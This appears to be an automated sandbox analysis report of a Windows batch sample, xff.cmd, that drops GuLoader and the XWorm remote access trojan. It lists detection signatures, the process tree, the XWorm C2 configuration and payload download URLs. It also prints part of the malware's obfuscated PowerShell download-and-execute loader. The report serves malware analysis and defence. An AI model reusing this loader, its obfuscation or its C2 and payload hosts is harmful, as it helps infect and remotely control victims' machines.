Windows Analysis Report
xff.cmd

Overview

General Information

Sample name: xff.cmd
Analysis ID: 1446785
MD5: 798c0f3c0c128497007a0616ef8d6b93
SHA1: cedbb573042a3275475973d0a6d45510a1941cd1
SHA256: 76611689034914a32d83d3fafbd528f7498fcd80a78c19fb2d8e93f39ce14dc6
Tags: cmd

Detection

GuLoader, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected XWorm
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 4392 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\xff.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4904 cmdline: powershell.exe -windowstyle hidden "[obfuscated PowerShell script omitted]" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7340 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tider.Dre && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7776 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell script omitted]" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7860 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tider.Dre && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 8172 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • WerFault.exe (PID: 7164 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8172 -s 2772 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": ["nmds.duckdns.org"], "Port": "8895", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
Source | Rule | Description | Author | Strings
0000000F.00000002.3135063808.0000000023051000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
0000000C.00000002.1682604695.00000000080A0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
0000000C.00000002.1672297363.0000000005654000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
0000000C.00000002.1682745414.000000000A8FD000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000003.00000002.1879512931.000002AD51831000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
            Source | Rule | Description | Author | Strings
            amsi64_4904.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
            amsi32_7776.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
              • 0xe285:$b2: ::FromBase64String(
              • 0xd32d:$s1: -join
              • 0x13519:$s3: Reverse
              • 0x6ad9:$s4: +=
              • 0x6b9b:$s4: +=
              • 0xadc2:$s4: +=
              • 0xcedf:$s4: +=
              • 0xd1c9:$s4: +=
              • 0xd30f:$s4: +=
              • 0x173d3:$s4: +=
              • 0x17453:$s4: +=
              • 0x17519:$s4: +=
              • 0x17599:$s4: +=
              • 0x1776f:$s4: +=
              • 0x177f3:$s4: +=
              • 0xdb1a:$e4: Get-WmiObject
              • 0xdd09:$e4: Get-Process
              • 0xdd61:$e4: Start-Process
              • 0x15ee7:$e4: Get-Process

              System Summary

              Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\SysWOW64\WerFault.exe -u -p 8172 -s 2772, CommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p 8172 -s 2772, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WerFault.exe, NewProcessName: C:\Windows\SysWOW64\WerFault.exe, OriginalFileName: C:\Windows\SysWOW64\WerFault.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 8172, ParentProcessName: wab.exe, ProcessCommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p 8172 -s 2772, ProcessId: 7164, ProcessName: WerFault.exe
              Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "[obfuscated PowerShell script omitted]"
              Timestamp: 05/23/24-21:09:07.075167
              SID: 2855924
              Source Port: 49720
              Destination Port: 8895
              Protocol: TCP
              Classtype: A Network Trojan was detected

              Timestamp: 05/23/24-21:10:13.764044
              SID: 2853193
              Source Port: 49720
              Destination Port: 8895
              Protocol: TCP
              Classtype: A Network Trojan was detected

              Timestamp: 05/23/24-21:11:06.119277
              SID: 2852874
              Source Port: 8895
              Destination Port: 49720
              Protocol: TCP
              Classtype: A Network Trojan was detected

              Timestamp: 05/23/24-21:11:06.119277
              SID: 2852870
              Source Port: 8895
              Destination Port: 49720
              Protocol: TCP
              Classtype: A Network Trojan was detected

              AV Detection

              Source: http://pesterbdd.com/images/Pester.png, URL Reputation: Label: malware
              Source: nmds.duckdns.org, Avira URL Cloud: Label: malware
              Source: 0000000F.00000002.3135063808.0000000023051000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: Xworm {"C2 url": ["nmds.duckdns.org"], "Port": "8895", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
              Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.0% probability
              Source: unknown, HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.10:49711 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.10:49712 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.10:49718 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.10:49719 version: TLS 1.2

              Networking

              Source: Traffic, Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 12.202.180.134:8895 -> 192.168.2.10:49720
              Source: Traffic, Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 12.202.180.134:8895 -> 192.168.2.10:49720
              Source: Traffic, Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.10:49720 -> 12.202.180.134:8895
              Source: Traffic, Snort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.10:49720 -> 12.202.180.134:8895
              Source: Malware configuration extractor, URLs: nmds.duckdns.org
              Source: unknown, DNS query: name: nmds.duckdns.org
              Source: global traffic, TCP traffic: 192.168.2.10:49720 -> 12.202.180.134:8895
              Source: Joe Sandbox View, IP Address: 69.31.136.17
              Source: Joe Sandbox View, IP Address: 12.202.180.134
              Source: Joe Sandbox View, IP Address: 104.21.28.80
              Source: Joe Sandbox View, IP Address: 69.31.136.57
              Source: Joe Sandbox View, ASN Name: FISERV-INCUS
              Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /pro/dl/ow9148 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /dlpro/3f6d43e0acc954908c31e25fcf4bf945/664f9418/ow9148/Supervene.pfb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs13n3.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /pro/dl/ougyql HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dlpro/b38ae3db991f0ad99006fe4234117e3b/664f9440/ougyql/mvQWivKaVtxblG80.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs03n4.sendspace.comConnection: Keep-AliveCookie: SID=5hrvd3jvoolunq5gv3jhegf975
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic DNS traffic detected: DNS query: www.sendspace.com
              Source: global traffic DNS traffic detected: DNS query: fs13n3.sendspace.com
              Source: global traffic DNS traffic detected: DNS query: fs03n4.sendspace.com
              Source: global traffic DNS traffic detected: DNS query: nmds.duckdns.org
              Source: powershell.exe, 00000003.00000002.1788126978.000002AD435B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fs13n3.sendspace.com
              Source: powershell.exe, 00000003.00000002.1879512931.000002AD51831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1672297363.000000000540B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 0000000C.00000002.1669254293.00000000044FC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000003.00000002.1788126978.000002AD417C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1669254293.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3135063808.0000000023051000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: Amcache.hve.23.dr String found in binary or memory: http://upx.sf.net
              Source: powershell.exe, 0000000C.00000002.1669254293.00000000044FC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 0000000C.00000002.1675028556.0000000006D81000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
              Source: powershell.exe, 00000003.00000002.1788126978.000002AD4357B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sendspace.com
              Source: powershell.exe, 00000003.00000002.1788126978.000002AD417C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 0000000C.00000002.1669254293.00000000043A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 0000000C.00000002.1672297363.000000000540B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000000C.00000002.1672297363.000000000540B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000000C.00000002.1672297363.000000000540B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
              Source: wab.exe, 0000000F.00000003.1665443342.00000000075CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fs03n4.sendspace.com/
              Source: wab.exe, 0000000F.00000003.1657420139.00000000075CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fs03n4.sendspace.com/A
              Source: wab.exe, 0000000F.00000003.1657420139.00000000075CA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3121592482.00000000075AE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3121592482.00000000075C0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3121592482.0000000007591000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.1665443342.00000000075CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fs03n4.sendspace.com/dlpro/b38ae3db991f0ad99006fe4234117e3b/664f9440/ougyql/mvQWivKaVtxblG80
              Source: wab.exe, 0000000F.00000003.1657420139.00000000075CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fs03n4.sendspace.com/yK
              Source: powershell.exe, 00000003.00000002.1788126978.000002AD435A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fs13n3.sendspaXpAk
              Source: powershell.exe, 00000003.00000002.1788126978.000002AD41C56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1788126978.000002AD435A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fs13n3.sendspace.com
              Source: powershell.exe, 00000003.00000002.1788126978.000002AD41C56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1788126978.000002AD41C52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1788126978.000002AD4357B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1788126978.000002AD435A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1788126978.000002AD4359C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fs13n3.sendspace.com/dlpro/3f6d43e0acc954908c31e25fcf4bf945/664f9418/ow9148/Supervene.pfb
              Source: powershell.exe, 0000000C.00000002.1669254293.00000000044FC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000003.00000002.1788126978.000002AD42A5D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
              Source: powershell.exe, 00000003.00000002.1879512931.000002AD51831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1672297363.000000000540B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000003.00000002.1788126978.000002AD43086000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1788126978.000002AD419ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com
              Source: wab.exe, 0000000F.00000002.3121592482.0000000007558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/
              Source: wab.exe, 0000000F.00000002.3133396783.0000000022630000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3121592482.0000000007591000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/pro/dl/ougyql
              Source: powershell.exe, 0000000C.00000002.1669254293.00000000044FC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/pro/dl/ow9148
              Source: powershell.exe, 00000003.00000002.1788126978.000002AD419ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/pro/dl/ow9148P
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknown HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.10:49711 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.10:49712 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.10:49718 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.10:49719 version: TLS 1.2

              System Summary

              Source: amsi32_7776.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 4904, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 6851
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6875
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process Stats: CPU usage > 49%
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF7C193B8C2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF7C193AB5A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00C4E928
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00C4F1F8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00C42045
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00C4E5E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00C41FD5
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_22FDEB98
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8172 -s 2772
              Source: amsi32_7776.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 4904, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engine Classification label: mal100.troj.evad.winCMD@14/14@4/4
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Tider.Dre
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: NULL
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: \Sessions\1\BaseNamedObjects\O3B5rRVaa3oX74CD
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6820:120:WilError_03
              Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8172
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:564:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nvwr4l2v.4ib.ps1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4904
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7776
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
              Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\xff.cmd" "
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Shave = 1;$Stikningens='Sub';$Stikningens+='strin';$Stikningens+='g';Function Sideblikkets($Missel){$Wandoo=$Missel.Length-$Shave;For($Unisexuality=5;$Unisexuality -lt $Wandoo;$Unisexuality+=6){$Berseems+=$Missel.$Stikningens.Invoke( $Unisexuality, $Shave);}$Berseems;}function Mekhitarist($Starchflower){& ($Plukningernes) ($Starchflower);}$Skolekommissionerne=Sideblikkets 'kedelMSepteoAk dezHund.iLivsflAesculBloksaCo ds/ Call5pred,.Tizwi0Liebh P ery(MaalbW.ormaiReklanSonnedNdst.oUneffwNonadsBen.i Obs rNSt.anTApert D cum1Zolao0Sel.k.Raad 0Impen;Blodh N,nclW.aldyiT lelnDagui6Midal4Cicer;genne S.llex ype6 C,ys4 Ord ;Paras ,attr Seigv Trem:a pro1 Dubh2Varme1 Glan.Skand0 Cucu)skatt F adrGUndere OuttcP,litkLandooAspa / Benb2 Genf0Outfi1Crim.0Af.an0Amphi1Warri0Theca1 Komm BosomFUrovaiFar,brBoateeVoco.fAralkoFacadxFysio/ Jess1marke2Ta.sh1Miili. Rang0Store ';$Forvaltningsmyndigheden=Sideblikkets 'Eksp USkr,bslucinePrel,rSkakt-YoghuAP pelgFilt.e haln Endet aks, ';$Disgustful=Sideblikkets ' hedhOverntrothet Ind.p DeacsBlued:Speac/U,clo/ TraswPseudwDaanewProca.Dissis Ras.eStjernPrededRednisTemaspD.fraaIndrec Helle A st.Acentcthorao draem Fed,/Statip,illbrnrbeso A.oc/ExactdBistnl Club/Postuo utscwNiger9fuldf1Stoic4Bisto8Bikag ';$Fangstkvotaer=Sideblikkets 're te> Laur ';$Plukningernes=Sideblikkets 'Sa,spiTapiseHell.xkomma ';$Fertilizables='Indkapslingerne140';$Koden = Sideblikkets ' P gleDtsilc.msvbh S eeo Ex.u digit%Supe,alevi p .erjpStrumdBe ikaStridtDat.taStand%Prokl\BoligTUlykki ForydFaxeheStor,rKokko. 
P,stDSaturrSoutre over S,ilo&Desig&Rang Kon re Ty.ec ModehSupinoFre e NadintLindi ';Mekhitarist (Sideblikkets 'Machi$ParengFrokolNage oBes.obFormuaKommul Syll:AktioMCloseiForfrsBrig tDonkeeSteg,rGaleo=Falsi(Gan.hcMislam,elatd Trid Busse/,iscocKomme nonsu$UnchaK PileoDoigtdYojane DistnTripl),rrit ');Mekhitarist (Sideblikkets 'Adres$nonbrg TilslStillo TongbHavneaHerrelProle:PinctDFaseraV,sicgIn,ulu haboe LapnrradiorLae,eeJalteoTubert DrifySandwp,nfori LeareStalkn,pildsProbl=Trekv$ZoogeD UmbriF,ftes InspgFlaxwuNon,psMuscatBo,caf dumpuF.renlOrnit.Ra.posPreprpS riel P.opiJerbot Nece(Cauli$Micr,FUnpr.aFr,ngnL,berg Af,us ungst Sk,lk Sph.vSte eoHaanltS,antaKrepeeRyaerrFo,mu),ehan ');$Disgustful=$Daguerreotypiens[0];$Unsingularness= (Sideblikkets 'Dugou$ rosegGreenlPr.yeoCoxswb Nesha HofmlNonbu: Bjf.BKoordesubs,b L.mpu UnkndS.ggeeNyserrBe.senEm greEvn,nsMinds=flaadNHjerte UnslwDoubt- WhitORonkebfunktj,enopeSpo.vcDokumtHym n tilgS FantySmagls yruptFougueKlampmTottl.sondeNDecigeK jsetpaleb.ChlamWFla,keThronbKrofoCPuls,lgordiiglauceBehovnTandbt');$Unsingularness+=$Mister[1];Mekhitarist ($Unsingularness);Mekhitarist (Sideblikkets 'Neg,e$RadioB,ndule HjembIntrauS.cerdNonpeeKabelrBrugen T,leeunhe.sCeteo. ,omiH RegneSk rpaHelvedGa ewe UdstrSupersBomae[Bletr$sandsFSlaveoDummerVentovBr ebakalfalSkulktAbsolnDesilif,rhanSopragAktiesKl mam Mic.yPe,ronIndi d P,gui fy.ig ,avnhPa
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tider.Dre && echo t"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" followed by the same obfuscated script as in the powershell.exe command line above
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tider.Dre && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8172 -s 2772
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: wab.pdbJ# source: wab.exe, 0000000F.00000002.3136825596.000000002534A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Drawing.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: System.Management.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb_ source: wab.exe, 0000000F.00000002.3136825596.0000000025310000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: System.Management.ni.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: \??\C:\Windows\mscorlib.pdb source: wab.exe, 0000000F.00000002.3136825596.0000000025310000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: @^o.pdb source: wab.exe, 0000000F.00000002.3136237540.000000002524A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbr8 source: wab.exe, 0000000F.00000002.3136825596.000000002534A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 \ source: wab.exe, 0000000F.00000002.3121592482.00000000075C0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb@@_ source: wab.exe, 0000000F.00000002.3136237540.000000002524A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.ni.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: System.Core.ni.pdbRSDS source: WERF2D5.tmp.dmp.23.dr

              Data Obfuscation

              Source: Yara match File source: 0000000C.00000002.1682745414.000000000A8FD000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000C.00000002.1682604695.00000000080A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000C.00000002.1672297363.0000000005654000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
